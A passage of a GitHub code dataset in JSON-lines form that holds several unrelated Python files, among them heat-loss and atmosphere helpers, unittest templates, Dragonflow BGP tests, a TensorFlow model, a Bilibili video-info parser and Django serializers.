-------\n flow velocity [m/s]: numeric\n\n \"\"\"\n rho = PropsSI(\n 'D', 'T', T_av + 273.15, 'P', p, 'IF97::Water') # [kg/m^3]\n\n return mf / (rho * (0.5 * di) ** 2 * math.pi)\n\n\ndef calc_pipe_loss(temp_average, u_value, temp_ground=10):\n r\"\"\"\n Calculates the heat loss of a DHS pipe trench.\n\n Temperatures must be given in the same unit, K or °C.\n\n .. calc_pipe_loss_equation:\n\n :math:`P_{loss} = (T_{average} - T_{ground}) \\cdot U`\n\n Parameters\n ----------\n temp_average : float\n :math:`T_{average}`: Average temperature of the medium\n (if u_value relates to forward and return pipe,\n the average temperature of forward and return must be given.)\n u_value : float\n :math:`U`: Heat transmission coefficient of the whole trench in W/(m*K)\n (u_value of forward and return pipe must be summed up if the total\n heat loss is to be calculated.)\n temp_ground : float\n :math:`T_{ground}`: Temperature of surrounding, e.g. 
ground.\n\n Returns\n -------\n Heat loss of pipe trench [W/m]: float\n \"\"\"\n return (temp_average - temp_ground) * u_value\n","repo_name":"oemof/DHNx","sub_path":"dhnx/optimization/precalc_hydraulic.py","file_name":"precalc_hydraulic.py","file_ext":"py","file_size_in_byte":17700,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"48"} +{"seq_id":"40284150044","text":"import csv\n\n# Interface to the data contained in atmosphere.csv\nclass Atmosphere(object):\n # Dependent on data source\n HEIGHT_MIN = -304.8\n HEIGHT_MAX = 85344\n # Public\n def __init__(self,file='atmosphere.csv'):\n self._data = []\n self.load_data(file)\n\n def load_data(self, file):\n with open(file, 'r') as data_file:\n csv_reader = csv.DictReader(data_file, delimiter = ',')\n for line in csv_reader:\n self._data.append(line)\n\n def get_attribute_by_height(self, height, attribute):\n index = self._get_index_by_height(height)\n\n # valid row indices run from 0 to len(self._data) - 1\n if index < 0 or index >= len(self._data):\n print('Index out of bounds: ', index)\n return -1\n\n # Perform a linear approximation if between terms\n base_height = float(self._data[index]['alt (m)'])\n height_diff = height - base_height\n if height_diff < 0.1: # allow for floating point inexactness\n return float(self._data[index][attribute])\n else:\n next_index = index + 1\n next_height = float(self._data[next_index]['alt (m)'])\n delta_height = float(next_height - base_height)\n\n base_attribute = float(self._data[index][attribute])\n next_attribute = float(self._data[next_index][attribute])\n delta_attribute = next_attribute - base_attribute\n\n return base_attribute + (delta_attribute * height_diff) / delta_height\n\n def get_pressure_by_height(self, height):\n return self.get_attribute_by_height(height, 'press (kpa)')\n\n def get_density_by_height(self, height):\n return self.get_attribute_by_height(height, 'dens (kg/cu.m)')\n\n\n # Private\n @staticmethod\n def _get_index_by_height(height):\n if height < Atmosphere.HEIGHT_MIN or height > Atmosphere.HEIGHT_MAX:\n return -1\n\n if height < 19812:\n return int((height / 304.8) + 1)\n else:\n return int(66 + ((height / 1524) - 13))\n","repo_name":"ZenithSuborbitals/Rocket-Flight-Simulator","sub_path":"rocket_flight_simulator/atmosphere.py","file_name":"atmosphere.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"73293001744","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Generic test cases.\"\"\"\n\nimport unittest\nimport warnings\nfrom textwrap import dedent\nfrom typing import (\n Any,\n ClassVar,\n Collection,\n Generic,\n Iterable,\n Mapping,\n MutableMapping,\n Optional,\n Type,\n TypeVar,\n)\n\n__all__ = [\n \"GenericTestCase\",\n \"MetaTestCase\",\n \"TestsTestCase\",\n]\n\nT = TypeVar(\"T\")\nX = TypeVar(\"X\")\n\n\nclass GenericTestCase(Generic[T], unittest.TestCase):\n \"\"\"Generic tests.\"\"\"\n\n cls: ClassVar[Type[T]] # type:ignore\n kwargs: ClassVar[Optional[Mapping[str, Any]]] = None\n instance: T\n\n def setUp(self) -> None:\n \"\"\"Set up the generic testing method.\"\"\"\n if not hasattr(self, \"cls\"):\n self.skipTest(\n dedent(\n f\"\"\"\\\n The class variable `cls` was not set on {self.__class__}.\n If you have implemented a subclass of :class:`unittest_template.GenericTestCase`,\n make sure you do it by only importing :mod:`unittest_template`, then accessing it\n with the dot operator. 
Do NOT do ``from unittest_template import GenericTestCase``,\n otherwise your testing harness might collect it as a stand-alone test and try to\n run it, which will always result in this failure.\n \"\"\"\n )\n )\n\n self.pre_setup_hook()\n kwargs = self.kwargs or {}\n self.instance_kwargs = self._pre_instantiation_hook(kwargs=dict(kwargs))\n self.instance = self.cls(**self.instance_kwargs) # type: ignore\n self.post_instantiation_hook()\n\n def pre_setup_hook(self) -> None:\n \"\"\"Run before setUp.\"\"\"\n\n def _pre_instantiation_hook(self, kwargs: MutableMapping[str, Any]) -> MutableMapping[str, Any]:\n \"\"\"Perform actions before instantiation, potentially modifying kwargs.\"\"\"\n return kwargs\n\n def post_instantiation_hook(self) -> None:\n \"\"\"Perform actions after instantiation.\"\"\"\n\n def test_instance(self):\n \"\"\"Trivially check the instance matches the class.\"\"\"\n self.assertIsInstance(self.instance, self.cls)\n\n\ndef get_subclasses(cls: Type[X]) -> Iterable[Type[X]]:\n \"\"\"Get all subclasses.\n\n :param cls: The ancestor class\n :yields: Descendant classes of the ancestor class\n \"\"\"\n for subclass in cls.__subclasses__():\n yield from get_subclasses(subclass)\n yield subclass\n\n\nclass MetaTestCase(Generic[T], unittest.TestCase):\n \"\"\"A generic test for tests.\"\"\"\n\n base_cls: ClassVar[Type[T]] # type:ignore\n base_test: ClassVar[Type[GenericTestCase[T]]] # type:ignore\n skip_cls: ClassVar[Optional[Collection[T]]] = None # type:ignore\n\n def test_testing(self):\n \"\"\"Check that there is a test for all subclasses.\"\"\"\n try:\n to_test = set(get_subclasses(self.base_cls))\n except AttributeError:\n self.fail(\n msg=dedent(\n f\"\"\"\\\n The class variable `base_cls` was not set on {self.__class__}. If you have implemented\n a subclass of unittest_template.MetaTestCase, make sure you do it by only importing\n unittest_template, then accessing it with the dot operator. 
Do NOT do\n `from unittest_template import MetaTestCase`, otherwise your testing harness might\n collect it as a stand-alone test and try to run it, which will always result in this\n failure.\n \"\"\"\n )\n )\n\n if self.skip_cls is not None:\n to_test.difference_update(self.skip_cls)\n tested = {\n test_cls.cls\n for test_cls in get_subclasses(self.base_test)\n if hasattr(test_cls, \"cls\") # avoid mid-level classes\n }\n not_tested = to_test.difference(tested)\n self.assertEqual(\n set(), not_tested, msg=f\"Some subclasses of {self.base_cls} were not tested.\"\n )\n\n\nclass TestsTestCase(MetaTestCase):\n \"\"\"A backwards compatible wrapper of MetaTestCase.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the test case.\"\"\"\n warnings.warn(\n \"unittest_templates.TestsTestCase has been renamed to unittest_templates.MetaTestCase\",\n DeprecationWarning,\n )\n super().setUp()\n","repo_name":"cthoyt/unittest-templates","sub_path":"src/unittest_templates/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"33376942814","text":"'''\n\nsplit() splits a string into a list; it can split every word of an English sentence into a list of items.\nThe syntax is:\n\nstring_name.split()\nstring_name.split(\",\") # use the comma character as the separator when splitting the string into a list\n\n'''\n\nstr1 = \" this is a pen \"\nlist1 = str1.split()\nprint(list1)\n\nlist2 = str1.split(\",\")\nprint(list2)","repo_name":"alankowabunga/Python","sub_path":"python-textbook/Ch05串列與元組/12split.py","file_name":"12split.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18789626954","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport threading\n\nimport eventlet\nfrom eventlet import greenthread\nimport mock\n\nfrom dragonflow.controller import df_bgp_service\nfrom dragonflow.db import api_nb\nfrom dragonflow.db.models import bgp\nfrom dragonflow.tests import base as tests_base\n\n\ndef get_all_side_effect(model, topic=None):\n if model == bgp.BGPPeer:\n return [bgp.BGPPeer(id=\"peer1\",\n topic=\"topic1\",\n name=\"peer1\",\n peer_ip=\"172.24.4.88\",\n remote_as=4321)]\n\n if model == bgp.BGPSpeaker:\n return [bgp.BGPSpeaker(id=\"speaker1\",\n topic=\"topic1\",\n name=\"speaker1\",\n local_as=1234,\n peers=[\"peer1\"],\n host_routes=[],\n prefix_routes=[],\n ip_version=4)]\n\n\nclass LoopingCallByEvent(object):\n def __init__(self, func):\n self.func = func\n self.thread = None\n self.event = None\n self.is_running = False\n\n def start(self, *args):\n self.event = threading.Event()\n self.is_running = True\n self.thread = greenthread.spawn(self.run)\n\n def stop(self):\n self.is_running = False\n\n def fire(self):\n self.event.set()\n eventlet.sleep(1)\n\n def run(self):\n self.event.wait()\n while self.is_running:\n self.func()\n self.event.clear()\n self.event.wait()\n\n\nclass TestDFBGPService(tests_base.BaseTestCase):\n\n def setUp(self):\n super(TestDFBGPService, self).setUp()\n mock.patch('dragonflow.controller.df_bgp_service.'\n 'BGPService.initialize_driver').start()\n mock_nb_api = mock.patch('dragonflow.db.api_nb.NbApi.get_instance')\n mock_nb_api.start()\n self.addCleanup(mock_nb_api.stop)\n nb_api = api_nb.NbApi.get_instance()\n self.bgp_service = df_bgp_service.BGPService(nb_api)\n self.bgp_service.bgp_driver = mock.Mock()\n self.bgp_service.bgp_pulse = LoopingCallByEvent(\n self.bgp_service.sync_data_from_nb_db)\n\n iter_models = mock.patch('dragonflow.db.model_framework.iter_models',\n return_value={bgp.BGPSpeaker, bgp.BGPPeer})\n iter_models.start()\n self.addCleanup(iter_models.stop)\n self.bgp_service.start()\n self.addCleanup(self.bgp_service.stop)\n\n def test_sync_bgp_data_to_db_store(self):\n self.bgp_service.nb_api.get_all.side_effect = get_all_side_effect\n # Give fixed interval a chance to run.\n self.bgp_service.bgp_pulse.fire()\n\n self.assertTrue(\n self.bgp_service.db_store.get_one(bgp.BGPPeer(id=\"peer1\")))\n self.assertTrue(\n self.bgp_service.db_store.get_one(bgp.BGPSpeaker(id=\"speaker1\")))\n\n def test_add_remove_bgp_peer_speaker(self):\n self.bgp_service.nb_api.get_all.side_effect = get_all_side_effect\n # Give fixed interval a chance to run.\n self.bgp_service.bgp_pulse.fire()\n\n self.bgp_service.bgp_driver.add_bgp_speaker.assert_called_once_with(\n 1234)\n self.bgp_service.bgp_driver.add_bgp_peer.assert_called_once_with(\n 1234, \"172.24.4.88\", 4321)\n\n def empty_get_all(model, topic=None):\n return []\n\n self.bgp_service.nb_api.get_all.side_effect = empty_get_all\n # Give fixed interval another round.\n self.bgp_service.bgp_pulse.fire()\n self.bgp_service.bgp_driver.delete_bgp_peer.assert_called_once_with(\n 1234, \"172.24.4.88\")\n self.bgp_service.bgp_driver.delete_bgp_speaker.assert_called_once_with(\n 1234)\n\n def test_advertise_withdraw_routes(self):\n self.bgp_service.nb_api.get_all.side_effect = get_all_side_effect\n # Give fixed interval a chance to run.\n\n def get_all_with_routes_side_effect(model, topic=None):\n if model == bgp.BGPPeer:\n return [bgp.BGPPeer(id=\"peer1\",\n topic=\"topic1\",\n name=\"peer1\",\n peer_ip=\"172.24.4.88\",\n 
remote_as=4321)]\n\n if model == bgp.BGPSpeaker:\n routes = [{'destination': \"10.0.0.0/24\",\n 'nexthop': \"172.24.4.66\"}]\n return [bgp.BGPSpeaker(id=\"speaker1\",\n topic=\"topic1\",\n name=\"speaker1\",\n local_as=1234,\n peers=[\"peer1\"],\n prefix_routes=routes,\n host_routes=[],\n ip_version=4)]\n\n self.bgp_service.nb_api.get_all.side_effect = (\n get_all_with_routes_side_effect)\n\n self.bgp_service.bgp_pulse.fire()\n\n self.bgp_service.bgp_driver.advertise_route.assert_called_once_with(\n 1234, \"10.0.0.0/24\", \"172.24.4.66\")\n\n self.bgp_service.nb_api.get_all.side_effect = get_all_side_effect\n self.bgp_service.bgp_pulse.fire()\n self.bgp_service.bgp_driver.withdraw_route.assert_called_once_with(\n 1234, \"10.0.0.0/24\")\n","repo_name":"openstack-archive/dragonflow","sub_path":"dragonflow/tests/unit/test_df_bgp_service.py","file_name":"test_df_bgp_service.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"} +{"seq_id":"8847416482","text":"\"\"\"\nBasic I : How to read images ?\n\nTo hold or read a image we will use a image variable and \nwe will need the 'imread'(which will take the img loc path) \nfunction to do so after that in order to show the image we \nwill use 'imshow'(which will take output window name as a string \nand the image object from imread func) function. To make the window\nstay we will use waitKey function with 0 which means infinity any \nother value will be in ms. \n\"\"\"\n\n\nimport cv2\n\ndef read_image(img_path):\n img = cv2.imread(img_path)\n cv2.imshow(\"Output\", img)\n cv2.waitKey(0)\n return 0\n\nif __name__ == \"__main__\":\n img_path = \"F:/git/opencv-projects-python/resources/nature.jpg\"\n read_image(img_path)","repo_name":"FatinShadab/opencv-projects-python","sub_path":"Basic_Task/read_img.py","file_name":"read_img.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1368027500","text":"#\n# @lc app=leetcode id=2 lang=python3\n#\n# [2] Add Two Numbers\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n ans = dummy = ListNode(0)\n carry = 0\n while l1 or l2 or carry:\n val1 = l1.val if l1 else 0\n val2 = l2.val if l2 else 0\n dummy.next = ListNode((val1 + val2 + carry) % 10)\n carry = (val1 + val2 + carry) // 10\n l1 = l1.next if l1 else l1\n l2 = l2.next if l2 else l2\n dummy = dummy.next \n return ans.next\n \n# @lc code=end\n\n","repo_name":"quixoteji/Leetcode","sub_path":"solutions/2.add-two-numbers.py","file_name":"2.add-two-numbers.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1752035827","text":"import tensorflow as tf\r\nfrom utils.Utils import *\r\n\r\n\r\nclass CriticalMirrorNetLearnable(object):\r\n \"\"\"\r\n Class representing a critical echo net\r\n \"\"\"\r\n\r\n def __init__(self, params, hidden_weights=None):\r\n self.params = params\r\n self.network_shape = self.params['network_shape']\r\n self.input_dim = self.network_shape[0]\r\n self.output_dim = self.network_shape[-1]\r\n self.batch_size = self.params['batch_size']\r\n self.hidden_weights = hidden_weights\r\n self.tensorboard_dir = self.params['tensorboard_dir']\r\n\r\n self.activation_function = 
self.params['activation_function']\r\n self.optimizer_ = self.params['optimizer']\r\n self.hs_optimizer_ = self.params['optimizer']\r\n # model\r\n self.input = tf.placeholder(tf.float32, [None, self.input_dim], name=\"input\")\r\n self.output = tf.placeholder(tf.float32, [None, self.output_dim], name=\"output\")\r\n self.activation_patterns = {}\r\n self.hidden_state_activation_patterns = {}\r\n self.activation = self.input\r\n self.hidden_states = {}\r\n self.hidden_states_update_ops = {}\r\n for i in range(1, len(self.network_shape) - 1):\r\n with tf.name_scope(\"layer{0}\".format(i)):\r\n h = tf.Variable(tf.truncated_normal([self.network_shape[i]]), name=\"hidden_state\", trainable=False)\r\n # h = tf.truncated_normal([self.batch_size, self.network_shape[i]])\r\n self.hidden_states[\"hs_{0}\".format(i)] = h\r\n Utils.variable_summaries(self.hidden_states[\"hs_{0}\".format(i)], \"hs_{0}\".format(i))\r\n if self.hidden_weights is not None:\r\n H_tune = tf.Variable(1.0, trainable=False, name=\"H_tune\")\r\n # Utils.variable_summaries(H_tune, \"H_tune\")\r\n else:\r\n H_tune = tf.Variable(1, trainable=False, name=\"H_tune\")\r\n\r\n self.H_grad_modifier_list = []\r\n for i in range(len(self.network_shape) - 1):\r\n with tf.name_scope(\"layer{0}\".format(i + 1)):\r\n if i < len(self.network_shape) - 2:\r\n with tf.name_scope(\"hidden\"):\r\n\r\n # input weight and bias\r\n W = tf.Variable(\r\n tf.random_normal([self.network_shape[i], self.network_shape[i + 1]], stddev=0.05),\r\n name=\"W\")\r\n bW = tf.Variable(tf.random_normal([self.network_shape[i + 1]], stddev=0.05), name=\"bW\")\r\n Utils.variable_summaries(W, \"W\")\r\n Utils.variable_summaries(bW, \"bW\")\r\n H_name = \"H_{0}\".format(i + 1)\r\n if self.hidden_weights is not None and H_name in self.hidden_weights.keys():\r\n H = tf.Variable(self.hidden_weights[H_name].astype('float32'), dtype=tf.float32,\r\n trainable=True, name=\"H\")\r\n Utils.variable_summaries(H, \"H\")\r\n H_grad_modifier = tf.Variable(tf.random_normal([self.network_shape[i + 1], self.network_shape[i + 1]], stddev=0.05),\r\n trainable=True, name=\"h_grad_modifier\")\r\n Utils.variable_summaries(H_grad_modifier, \"h_grad_modifier\")\r\n self.H_grad_modifier_list.append(H_grad_modifier)\r\n else:\r\n H = tf.Variable(\r\n tf.random_normal([self.network_shape[i + 1], self.network_shape[i + 1]], stddev=0.05),\r\n trainable=False, name=\"H\")\r\n\r\n input_for_hidden = tf.matmul(self.activation, W) + bW\r\n tiled_h = tf.reshape(tf.tile(self.hidden_states[\"hs_{0}\".format(i + 1)], [self.batch_size]), [self.batch_size, -1])\r\n hidden_update = tf.nn.tanh(tf.add(input_for_hidden,\r\n tf.matmul(tiled_h, tf.scalar_mul(H_tune, H))))\r\n\r\n with tf.name_scope(\"mirror\"):\r\n # mirror input and bias\r\n M = tf.Variable(tf.random_normal([self.network_shape[i], self.network_shape[i + 1]], stddev=0.05), name=\"M\")\r\n bM = tf.Variable(tf.random_normal([self.network_shape[i + 1]], stddev=0.05), name=\"bM\")\r\n Utils.variable_summaries(M, \"M\")\r\n Utils.variable_summaries(bM, \"bM\")\r\n input_for_mirror = tf.nn.tanh(tf.matmul(self.activation, M) + bM)\r\n\r\n with tf.name_scope(\"readout\"):\r\n # readout weights and biases\r\n R = tf.Variable(tf.random_normal([self.network_shape[i + 1], self.network_shape[i + 1]], stddev=0.05), name=\"R\")\r\n bR = tf.Variable(tf.random_normal([self.network_shape[i + 1]], stddev=0.05), name=\"bR\")\r\n Utils.variable_summaries(R, \"R\")\r\n Utils.variable_summaries(bR, \"bR\")\r\n readout = tf.nn.tanh(tf.matmul(hidden_update, R) + 
bR)\r\n\r\n with tf.name_scope(\"activation\"):\r\n self.activation = self.activation_function(tf.multiply(readout, input_for_mirror))\r\n # self.hidden_state_activation_patterns['hidden_state_layer_{0}'.format(i + 1)] = self.hidden_states[self.hidden_states[\"hs_{0}\".format(i+1)]]\r\n self.hidden_states_update_ops[\"hs_{0}\".format(i+1)] = self.hidden_states[\"hs_{0}\".format(i+1)].assign(hidden_update[0])\r\n # self.hidden_states[\"hs_{0}\".format(i+1)] = hidden_update\r\n else:\r\n W = tf.Variable(\r\n tf.random_normal([self.network_shape[i], self.network_shape[i + 1]], stddev=0.05),\r\n name=\"W\")\r\n bW = tf.Variable(tf.random_normal([self.network_shape[i + 1]], stddev=0.05), name=\"bW\")\r\n Utils.variable_summaries(W, \"W\")\r\n Utils.variable_summaries(bW, \"bW\")\r\n with tf.name_scope(\"activation\"):\r\n self.activation = self.activation_function(tf.matmul(self.activation, W) + bW)\r\n act = self.activation\r\n if i > 0:\r\n self.activation_patterns['layer_{0}'.format(i)] = act\r\n\r\n # cost\r\n with tf.name_scope(\"cost\"):\r\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(self.activation, self.output))\r\n tf.summary.scalar('cost', self.cost)\r\n\r\n with tf.name_scope(\"accuracy\"):\r\n correct_prediction = tf.equal(tf.argmax(self.activation, 1), tf.argmax(self.output, 1))\r\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n gv = self.optimizer_.compute_gradients(self.cost)\r\n self.hidden_modifier_cost = self.optimize_hidden_modifier(gv)\r\n tf.summary.scalar('hidden_modifier_cost', self.hidden_modifier_cost)\r\n\r\n fm_gv = self.filter_modify_gradients(gv)\r\n\r\n gv_mod = self.hs_optimizer_.compute_gradients(self.hidden_modifier_cost)\r\n\r\n self.hs_optimizer = self.hs_optimizer_.apply_gradients([t for t in gv_mod if \"hidden/h_grad_modifier\" in t[1].name])\r\n\r\n self.optimizer = self.optimizer_.apply_gradients(fm_gv)\r\n\r\n self.sess = tf.Session()\r\n\r\n self.merged = tf.summary.merge_all()\r\n self.summ_writer = tf.summary.FileWriter(self.tensorboard_dir, self.sess.graph)\r\n\r\n init = tf.global_variables_initializer()\r\n\r\n self.sess.run(init)\r\n\r\n def partial_fit(self, X, Y):\r\n fetches = [self.cost, self.optimizer, self.merged, self.hidden_modifier_cost, self.hs_optimizer]\r\n for _, v in self.hidden_states_update_ops.items():\r\n fetches.append(v)\r\n cost, opt, merged, hs_cost, hs_opt, *_ = self.sess.run(fetches, feed_dict={self.input: X, self.output: Y})\r\n\r\n return cost, merged\r\n\r\n def set_batch_size(self, bs):\r\n self.batch_size = bs\r\n\r\n def inference(self, X, Y):\r\n bs = tf.shape(X)[0]\r\n if bs != self.batch_size:\r\n self.set_batch_size(bs)\r\n return self.sess.run(self.cost, feed_dict={self.input: X, self.output: Y})\r\n\r\n def optimize_hidden_modifier(self, gv):\r\n grad = []\r\n for tup in gv:\r\n if(\"hidden/H\" in tup[1].name):\r\n grad.append(tup[0])\r\n else:\r\n continue\r\n\r\n costs = []\r\n for (tupM, tup) in zip(self.H_grad_modifier_list, grad):\r\n costs.append(tf.reduce_sum(tf.abs(tf.reduce_sum(tf.multiply(tupM, tup), axis=1))))\r\n\r\n return tf.add_n(costs)\r\n\r\n def filter_modify_gradients(self, gv):\r\n modifiers = []\r\n to_modify = []\r\n rest = []\r\n for tup in gv:\r\n if(\"h_grad_modifier\" in tup[1].name):\r\n modifiers.append(tup)\r\n elif(\"hidden/H\" in tup[1].name):\r\n to_modify.append(tup)\r\n else:\r\n rest.append(tup)\r\n\r\n for (tupM, tup) in zip(modifiers, to_modify):\r\n rest.append((tf.multiply(tupM[1], tup[0]), tup[1]))\r\n\r\n return 
rest\r\n\r\n def get_accuracy(self, X, Y):\r\n bs = tf.shape(X)[0]\r\n if bs != self.batch_size:\r\n self.set_batch_size(bs)\r\n return self.sess.run(self.accuracy, feed_dict={self.input: X, self.output: Y})\r\n\r\n def calc_total_cost(self, X, Y):\r\n bs = tf.shape(X)[0]\r\n if bs != self.batch_size:\r\n self.set_batch_size(bs)\r\n return self.sess.run(self.cost, feed_dict={self.input: X, self.output: Y})\r\n\r\n def get_activations(self, X):\r\n return {k: self.sess.run(v, feed_dict={self.input: X}) for k, v in self.activation_patterns.items()}\r\n\r\n def get_activation_pattern(self, input_, activation_name=None):\r\n if activation_name is not None:\r\n return [self.sess.run(self.activation_patterns[activation_name], feed_dict={self.input: input_})]\r\n else:\r\n return [self.sess.run(self.activation_patterns['activation_layer_{0}'.format(i + 1)], feed_dict={self.input: input_})\r\n for i in range(len(self.network_shape) - 1)]\r\n\r\n def get_hidden_state_pattern(self, input_, activation_name=None):\r\n if activation_name is not None:\r\n return [self.sess.run(self.activation_patterns[activation_name], feed_dict={self.input: input_})]\r\n else:\r\n return [self.sess.run(self.hidden_state_activation_patterns['hidden_state_layer_{0}'.format(i + 1)], feed_dict={self.input: input_})\r\n for i in range(len(self.network_shape) - 1)]\r\n\r\n def get_weight(self, weight_name=None):\r\n if weight_name is not None:\r\n return [self.sess.run(self.weights[weight_name])]\r\n else:\r\n return [self.sess.run(self.weights['W_{0}'.format(i)]) for i in range(len(self.weights))]\r\n\r\n","repo_name":"eidonfiloi/criticalAI","sub_path":"models/CriticalMirrorNetLearnable.py","file_name":"CriticalMirrorNetLearnable.py","file_ext":"py","file_size_in_byte":11060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8402275341","text":"#!/usr/bin/python3\n'''\nsili - parse Bilibili videos\n'''\nfrom collections import namedtuple\nfrom html.parser import HTMLParser\nimport html\nimport json\nimport requests\n\n__all__ = [\"INFO_API_URL\", \"VIDEO_API_URL\", \"BANGUMI_PLAY_URL\", \"HTML_PARSER\",\n \"get_avid_from_epid\", \"get_video_info\", \"get_video_links\", \"UserInfo\",\n \"VideoInfo\", \"VideoStat\", \"PartInfo\", \"DownloadInfo\", \"FileInfo\", \"Vec2\"]\n\n# API for fetching video info (including part/page info); returns JSON\nINFO_API_URL:str = \"https://api.bilibili.com/x/web-interface/view?aid={avid}\"\n# API for fetching video URLs; returns JSON; the user is determined by SESSDATA in the cookies\nVIDEO_API_URL:str = \"https://api.bilibili.com/x/player/playurl?avid={avid}&cid={cid}&qn={quality}\"\n# Playback page for bangumi/movies/TV series, used to obtain the AVID\nBANGUMI_PLAY_URL:str = \"https://www.bilibili.com/bangumi/play/ep{epid}\"\n\nUserInfo = namedtuple(\"UserInfo\", [\"uid\", \"name\", \"avatar\"])\nVideoInfo = namedtuple(\"VideoInfo\", [\n \"avid\", \"title\", \"time\", \"description\", \"cover\", \"owner\", \"stat\", \"parts\"])\nVideoStat = namedtuple(\"VideoStat\", [\n \"view\", \"like\", \"coin\", \"favorite\", \"share\", \"danmaku\", \"comment\"])\nPartInfo = namedtuple(\"PartInfo\", [\n \"cid\", \"title\", \"duration\", \"size\"])\nDownloadInfo = namedtuple(\"DownloadInfo\", [\"quality\", \"duration\", \"files\"])\nFileInfo = namedtuple(\"FileInfo\", [\"duration\", \"size\", \"links\"])\nVec2 = namedtuple(\"Vec2\", [\"x\", \"y\"])\nclass Error(Exception): pass\nclass ApiError(Error):\n def __init__(self, code):\n super().__init__(code)\n self.code = code\nclass VideoNonExist(Error): pass\n\n
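# Note (added): AvidParser below scrapes the AVID out of the bangumi page HTML; it reads\n# the text of the element with class \"av-link\" (e.g. \"av12345\") and strips the \"av\" prefix.\n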
class AvidParser(HTMLParser):\n def __init__(self):\n super().__init__()\n self.avid = None\n self.started = False\n\n def handle_starttag(self, tag, attrs):\n if (\"class\", \"av-link\") in attrs:\n self.started = True\n\n def handle_data(self, data):\n if self.started:\n self.avid = int(data[2:])\n self.started = False\n\n\ndef get_avid_from_epid(epid:int) -> int:\n '''Get the AVID from an EPID'''\n assert 0 < epid < 0x80000000\n response = requests.get(BANGUMI_PLAY_URL.format(epid=epid))\n if response.status_code == 404:\n raise VideoNonExist(f\"ep{epid}\")\n response.raise_for_status()\n # TODO: I hope to one day get rid of the dependency on parsing HTML\n parser = AvidParser()\n parser.feed(response.text)\n return parser.avid\n\ndef get_video_info(avid:int) -> VideoInfo:\n '''Fetch video information'''\n assert 0 < avid < 0x80000000\n response = requests.get(INFO_API_URL.format(avid=avid))\n response.raise_for_status()\n data = response.json()\n if data[\"code\"] == -404:\n raise VideoNonExist(f\"av{avid}\")\n elif data[\"code\"] != 0:\n raise ApiError(data[\"code\"])\n parts = []\n for part in data[\"data\"][\"pages\"]:\n parts.append(PartInfo(\n title=part[\"part\"],\n cid=part[\"cid\"],\n duration=part[\"duration\"],\n size=Vec2(\n part[\"dimension\"][\"width\"],\n part[\"dimension\"][\"height\"])))\n return VideoInfo(\n avid=avid,\n title=data[\"data\"][\"title\"],\n time=data[\"data\"][\"pubdate\"],\n description=data[\"data\"][\"desc\"],\n cover=data[\"data\"][\"pic\"],\n owner=UserInfo(\n uid=data[\"data\"][\"owner\"][\"mid\"],\n name=data[\"data\"][\"owner\"][\"name\"],\n avatar=data[\"data\"][\"owner\"][\"face\"]),\n stat=VideoStat(\n view=data[\"data\"][\"stat\"][\"view\"],\n like=data[\"data\"][\"stat\"][\"like\"],\n coin=data[\"data\"][\"stat\"][\"coin\"],\n favorite=data[\"data\"][\"stat\"][\"favorite\"],\n share=data[\"data\"][\"stat\"][\"share\"],\n danmaku=data[\"data\"][\"stat\"][\"danmaku\"],\n comment=data[\"data\"][\"stat\"][\"reply\"]),\n parts=tuple(parts))\n\ndef get_video_files(avid:int, cid:int, quality:int=120, session:str=\"\"):\n response = requests.get(\n VIDEO_API_URL.format(avid=avid, cid=cid, quality=quality),\n cookies={\"SESSDATA\": session})\n response.raise_for_status()\n data = response.json()\n if data[\"code\"] == -404:\n raise VideoNonExist(f\"av{avid}\")\n elif data[\"code\"] != 0:\n raise ApiError(data[\"code\"])\n files = []\n for i in data[\"data\"][\"durl\"]:\n files.append(FileInfo(\n duration=i[\"length\"],\n size=i[\"size\"],\n links=tuple([i[\"url\"]] + i[\"backup_url\"])))\n return DownloadInfo(\n quality=data[\"data\"][\"quality\"],\n duration=data[\"data\"][\"timelength\"],\n files=tuple(files))\n","repo_name":"su226/small-projects","sub_path":"专栏下载器/sili/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1108480226","text":"from rest_framework import serializers\nfrom models import Anime, Subscription, User, Season, Track\n\n\n# Season serializers\nclass SeasonSerializer(serializers.ModelSerializer):\n class Meta:\n model = Season\n fields = ('id', 'name', 'cover', 'default', 'season_id', 'anime', 'count')\n\n\nclass SeasonOfSubscriptionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Season\n fields = ('id', 'name', 'cover', 'default', 'season_id', 'count')\n\n\n# Anime serializers\nclass AnimeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Anime\n fields = ('id', 'aid', 'name', 'description', 'is_end', 'episode', 'poster_link', 